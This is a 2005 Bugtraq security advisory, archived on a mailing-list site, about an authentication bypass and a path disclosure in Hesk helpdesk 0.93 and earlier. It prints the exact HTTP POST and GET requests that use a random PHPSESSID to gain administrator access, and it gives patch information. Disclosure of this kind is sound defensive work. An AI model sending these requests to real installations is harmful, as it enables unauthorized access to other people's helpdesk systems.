lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 20 Sep 2005 04:50:16 -0000
From: os2a.bto@...il.com
To: bugtraq@...urityfocus.com
Subject: Hesk Session ID Validation Vulnerability


OS2A

Hesk Session ID Validation Vulnerability


OS2A ID: OS2A_1003				Status
						9/13/2005 Issue Discovered
						9/14/2005 Reported to the vendor
						9/18/2005 Patch Released
						9/20/2005 Advisory Released
							

Class: Authentication Bypass			Severity: CRITICAL


Overview:
Hesk is a PHP based help desk software that runs with a MySQL database. 
It allows to setup a ticket based support system (helpdesk) for websites.
Hesk versions 0.93 and prior are vulnerable to authentication bypass and path 
disclosure vulnerabilities caused due to improper validation of the HTTP 
header. This vulnerability can be exploited to bypass authentication 
mechanism, and also made to reveal system specific information. 
 

Description:
Multiple vulnerabilities exist in Hesk ticket based support system.

1. Authentication Bypass
   The 'PHPSESSID', Session ID parameter in the HTTP header is not properly 
   validated. A malicious user can log in to the Administrator account by 
   sending a random value to 'PHPSESSID' parameter and posting it to 
   admin.php. This Session ID can then be utilized to access administrative 
   control panel. 
 
   This is similar to a previously reported vulnerability where invalid 
   User ID and Password were submitted. In this case, a randomly chosen 
   Session ID is sent along with the login request. 
   
2. Path Disclosure.
   Path information can be made to disclose in error pages by passing invalid 
   metacharacters such as "'" or "<" to 'PHPSESSID' field of the HTTP header.
   

Impact:
Successful exploitation can result in a compromise of the application, 
disclosure of system specific information.

Affected Systems:
Hesk 0.93 and prior.
Linux (Any), Unix (Any), Windows (Any)

Exploit:
1. HTTP POST request with randomly chosen Session ID:
POST admin.php +
("Host: host_ip
  User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) 
  Accept: text/xml,application/xml,application/xhtml+xml,text/html
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Referer: http://host_ip/hesk/admin.php
  Cookie: PHPSESSID=12345                             <!-- Random Session ID --!>
  Content-Type: application/x-www-form-urlencoded
  Content-Length: 26
  user=1&pass=sdfd&a=do_login");
 
2. GET request to administrative control panel:
GET admin_main.php +
("Host: host_ip
  User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) 
  Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain
  Accept-Language: en-us,en;q=0.5
  Accept-Encoding: gzip,deflate
  Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
  Keep-Alive: 300
  Connection: keep-alive
  Cookie: PHPSESSID=12345")                            <!-- Session ID --!>

Solutions:
	Patch: 
	http://www.phpjunkyard.com/extras/hesk_0931_patch.zip
	OR Hesk 0.93.1 from
	http://www.phpjunkyard.com/free-helpdesk-software.php

Credits:
Rajesh Sethumadhavan, Rahul Mohandas, and Jayesh K.S of OS2A have discovered 
the vulnerability

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ